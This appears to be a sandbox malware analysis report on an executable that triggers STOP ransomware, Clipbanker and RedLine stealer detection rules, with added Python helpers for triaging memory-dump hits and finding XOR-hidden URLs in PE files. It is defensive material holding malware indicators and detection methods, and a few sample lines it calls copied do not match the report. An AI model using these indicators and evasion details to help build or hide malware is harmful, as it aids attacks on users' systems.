Source: 00000011.00000002.378588767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000011.00000002.378588767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000E.00000000.347198189.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000E.00000000.347198189.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000004.00000002.362805036.0000000002280000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000B.00000002.347163945.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000B.00000002.347163945.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000006.00000000.321377469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000006.00000000.322799276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000006.00000000.322799276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000007.00000002.351892792.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.304747895.000000000218B000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000011.00000000.364650257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000011.00000000.364650257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000005.00000000.314511925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000005.00000000.314511925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000000.347232318.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000000.347232318.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000000.302933053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000001.00000000.302933053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000000.301522504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000000.345188173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000000.345188173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000008.00000002.349827384.00000000004B9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.348844154.000000000210E000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.364455127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000006.00000002.364455127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000005.00000000.315044936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000005.00000000.315044936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000010.00000002.373204030.00000000020F3000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000E.00000002.564552396.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000E.00000002.564552396.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000005.00000003.362157229.0000000003060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000005.00000003.362157229.0000000003060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000011.00000000.365343536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000011.00000000.365343536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000003.00000002.318350093.00000000020FB000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000005.00000000.317037787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000005.00000000.317037787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000011.00000000.363751420.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000006.00000000.322395529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000006.00000000.322395529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000005.00000000.313991274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000006.00000000.323671151.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000006.00000000.323671151.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000011.00000000.366169302.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000011.00000000.366169302.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000003.00000002.318481347.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000000.346399832.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000000.346399832.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000010.00000002.378615646.0000000002230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000002.353616538.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000002.353616538.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000000.303182079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000001.00000000.303182079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000000.302301176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000001.00000000.302301176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000011.00000000.364114264.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000011.00000000.364114264.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: U59WtZz2Sg.exe PID: 5228, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: U59WtZz2Sg.exe PID: 3692, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: U59WtZz2Sg.exe PID: 1272, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: U59WtZz2Sg.exe PID: 3184, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: U59WtZz2Sg.exe PID: 6132, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, type: DROPPED Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, type: DROPPED Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\build3[1].exe, type: DROPPED Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\build3[1].exe, type: DROPPED Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
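Most of the memory matches above are repeated dumps of the same few regions, and the dump name carries the information that separates unpacked or injected code from a module loaded from disk. Reading the names in this report, the fields after the numeric id look like base address, page protection and region type: every STOP match sits at 0000000000400000 with 00000040 (PAGE_EXECUTE_READWRITE) and 00020000 (MEM_PRIVATE), the private RWX layout of a payload written into a process rather than mapped from a file, while the Clipbanker matches in processes 0xB and 0xE are at B91000 and EE1000 with 00000020 (PAGE_EXECUTE_READ) and 01000000 (MEM_IMAGE), that is, a PE loaded normally from disk, consistent with the dropped mstsca.exe and build3[1].exe hits listed above. That field layout is an inference from the names, not a documented format. The following Python is an added triage helper, not part of the report or of the sandbox, that parses these report lines and groups hits by region and verdict:

```python
import re
from dataclasses import dataclass

# Page protection and region type constants from winnt.h
PAGE_EXECUTE, PAGE_EXECUTE_READ = 0x10, 0x20
PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY = 0x40, 0x80
EXECUTABLE_MASK = PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
MEM_PRIVATE, MEM_MAPPED, MEM_IMAGE = 0x00020000, 0x00040000, 0x01000000

PROTECT_NAMES = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                 0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                 0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
TYPE_NAMES = {MEM_PRIVATE: "MEM_PRIVATE", MEM_MAPPED: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}

# ASSUMED layout of the sandbox dump file name, inferred from the names in this report
# (not a documented format): <proc>.<dump>.<id>.<base>.<protect>.<f6>.<type>.<f8>.sdmp
# Only <base>, <protect> and <type> are decoded; those values line up with winnt.h.
SDMP_NAME = re.compile(
    r"([0-9A-F]{8})\.([0-9A-F]{8})\.(\d+)\.([0-9A-F]{16})\.([0-9A-F]{8})\.([0-9A-F]{8})"
    r"\.([0-9A-F]{8})\.([0-9A-F]{8})\.sdmp", re.IGNORECASE)
# One "Source: <dump>, type: MEMORY Matched rule: <rule> Author: ..." report line
REPORT_LINE = re.compile(
    r"Source:\s+(\S+\.sdmp),\s+type:\s+MEMORY\s+Matched rule:\s+(.+?)\s+Author:")


@dataclass(frozen=True)
class Hit:
    proc: int       # sandbox process index (first hex field)
    base: int       # region base address
    protect: int    # PAGE_* protection of the region
    mem_type: int   # MEM_PRIVATE / MEM_MAPPED / MEM_IMAGE
    rule: str       # Yara rule that fired

    @property
    def verdict(self) -> str:
        """Private RWX memory is the unpacked/injected case; MEM_IMAGE is a module from disk."""
        if self.mem_type == MEM_PRIVATE and self.protect == PAGE_EXECUTE_READWRITE:
            return "private RWX: unpacked or injected code"
        if self.mem_type == MEM_IMAGE:
            return "mapped image: match inside an on-disk module"
        if self.mem_type == MEM_PRIVATE and not self.protect & EXECUTABLE_MASK:
            return "private non-executable: staged payload or strings"
        return "other"


def parse_hit(line: str):
    """Return a Hit for one MEMORY report line, or None for any other line (e.g. MEMORYSTR)."""
    m = REPORT_LINE.search(line)
    n = SDMP_NAME.fullmatch(m.group(1)) if m else None
    if not n:
        return None
    return Hit(proc=int(n.group(1), 16), base=int(n.group(4), 16),
               protect=int(n.group(5), 16), mem_type=int(n.group(7), 16), rule=m.group(2))


def triage(lines):
    """Collapse repeated dumps of one region into {(proc, base, verdict): {rules}}."""
    groups = {}
    for line in lines:
        hit = parse_hit(line)
        if hit is not None:
            groups.setdefault((hit.proc, hit.base, hit.verdict), set()).add(hit.rule)
    return groups


def describe(hit: Hit) -> str:
    return (f"proc {hit.proc:#x} base {hit.base:#010x} "
            f"{PROTECT_NAMES.get(hit.protect, hex(hit.protect))} "
            f"{TYPE_NAMES.get(hit.mem_type, hex(hit.mem_type))} -> {hit.verdict}")


# Sample input: five lines copied from this report
SAMPLE = """\
Source: 00000011.00000000.367371233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000011.00000000.367371233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000B.00000000.345320617.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000005.00000003.362157229.0000000003060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: Process Memory Space: U59WtZz2Sg.exe PID: 5228, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
""".splitlines()

if __name__ == "__main__":
    for line in SAMPLE:
        hit = parse_hit(line)
        print(describe(hit) if hit else "skipped: " + line[:60])
    for (proc, base, verdict), rules in sorted(triage(SAMPLE).items()):
        print(f"{proc:#x} {base:#010x} {verdict}: {', '.join(sorted(rules))}")
```

Run over the whole report the grouping shrinks the hundred-odd memory lines to a handful of regions. Note the 0x3060000 region in process 5: it decodes as PAGE_READWRITE private memory, so the Clipbanker PE was present there as data inside the dropper before it ever ran, which is why the rule matches a region that is not executable.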
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_0040706A
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_004082BA
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0040D240
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00419F90
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0040C070
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0042E003
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0042F010
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00410160
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_004021C0
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0044237E
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_004344FF
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00449506
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0043E5A3
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0044B5B1
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0040A660
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0041E690
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00402750
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0040A710
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0040F730
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0044D7A1
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0042C804
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00481920
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0044D9DC
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00449A71
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00443B40
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00402B80
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0044ACFF
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0040DD40
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0040BDC0
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0042CE51
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00420F30
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00449FE3
Source: U59WtZz2Sg.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
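The three characteristics above come from the COFF header of the submitted file. RELOCS_STRIPPED means the image carries no base relocations and can only run at its ImageBase, which for a 32-bit Windows EXE is conventionally 0x400000, the same address every unpacked STOP payload in this report was dumped from; a dump that also carries this flag is a complete image at its preferred base rather than a fragment. The community rule matches that follow include SUSP_XORed_URL_in_EXE, which fires when a URL is hidden under a single-byte XOR, a cheap way to keep C2 addresses out of a plain strings dump. The following Python is an added example, not the sandbox's code and not Florian Roth's rule: it reads those header fields from a constructed minimal PE32 and brute-forces XOR keys for an http(s):// marker. The sample image, the XOR key 0x5A and the example.invalid URL are constructed for the demonstration.

```python
import struct

# COFF Characteristics bits (PE/COFF specification), listed in bit order
CHARACTERISTICS = [
    (0x0001, "RELOCS_STRIPPED"), (0x0002, "EXECUTABLE_IMAGE"), (0x0004, "LINE_NUMS_STRIPPED"),
    (0x0008, "LOCAL_SYMS_STRIPPED"), (0x0020, "LARGE_ADDRESS_AWARE"), (0x0100, "32BIT_MACHINE"),
    (0x0200, "DEBUG_STRIPPED"), (0x1000, "SYSTEM"), (0x2000, "DLL"),
]
IMAGE_FILE_RELOCS_STRIPPED = 0x0001
IMAGE_FILE_MACHINE_I386 = 0x014C


def parse_coff(data: bytes) -> dict:
    """Walk MZ -> e_lfanew -> PE signature -> COFF header -> optional header ImageBase."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    machine, _nsect, _ts, _symp, _nsym, _opt_size, chars = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24                        # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:                         # PE32: ImageBase is a DWORD at offset 28
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    elif magic == 0x20B:                       # PE32+: ImageBase is a QWORD at offset 24
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    return {
        "machine": machine,
        "characteristics": chars,
        "flags": [name for bit, name in CHARACTERISTICS if chars & bit],
        "image_base": image_base,
        # No .reloc data means the loader cannot rebase it: it runs at image_base or not at all
        "relocatable": not chars & IMAGE_FILE_RELOCS_STRIPPED,
    }


URL_MARKERS = (b"http://", b"https://")
URL_BYTES = frozenset(b"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
                      b"-._~:/?#[]@!$&'()*+,;=%")


def find_xored_urls(data: bytes, min_len: int = 10):
    """Try every single-byte XOR key 0x01..0xFF for an encoded http(s):// marker, then decode
    forward while the plaintext stays inside the URL character set. Returns (offset, key, url).
    Same idea as SUSP_XORed_URL_in_EXE, which uses Yara's xor string modifier plus its own
    false-positive filters; this function is not that rule."""
    found = []
    for key in range(1, 256):
        for marker in URL_MARKERS:
            needle = bytes(b ^ key for b in marker)
            pos = data.find(needle)
            while pos != -1:
                end = pos + len(marker)
                while end < len(data) and (data[end] ^ key) in URL_BYTES:
                    end += 1
                url = bytes(b ^ key for b in data[pos:end])
                if len(url) >= min_len:
                    found.append((pos, key, url.decode("ascii")))
                pos = data.find(needle, pos + 1)
    return sorted(found)


def build_sample_image(url: bytes = b"http://example.invalid/gate.php?id=", key: int = 0x5A) -> bytes:
    """CONSTRUCTED minimal PE32 with the flags this report shows (0x0103) and one XOR-encoded
    URL in its body. Not the sample from the report; example.invalid is a reserved name."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                      # e_lfanew
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_I386, 1, 0, 0, 0, 224, 0x0103)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                      # PE32 magic
    struct.pack_into("<I", opt, 28, 0x400000)                  # ImageBase
    section = bytes(40)                                        # one empty section header
    encoded = bytes(b ^ key for b in url + b"\x00")            # XORed string incl. terminator
    body = b"\x55\x8b\xec\x83\xec\x10" * 16 + encoded + b"\xcc" * 32
    return bytes(dos) + coff + bytes(opt) + section + body


def triage(data: bytes) -> dict:
    info = parse_coff(data)
    info["xored_urls"] = find_xored_urls(data)
    return info


if __name__ == "__main__":
    report = triage(build_sample_image())
    print(f"machine={report['machine']:#06x} flags={','.join(report['flags'])} "
          f"image_base={report['image_base']:#x} relocatable={report['relocatable']}")
    for offset, key, url in report["xored_urls"]:
        print(f"  xor key {key:#04x} at {offset:#x}: {url}")
```

With a real dump, pass the bytes of the .unpack file to triage() instead of build_sample_image(). Keep min_len in place: a 7-byte marker tested under 255 keys will occasionally appear by chance in a large binary, so every hit still deserves a look by hand before it goes into an indicator list.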
Source: dump.pcap, type: PCAP Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: dump.pcap, type: PCAP Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 5.3.U59WtZz2Sg.exe.3060000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 5.3.U59WtZz2Sg.exe.3060000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 9.0.U59WtZz2Sg.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
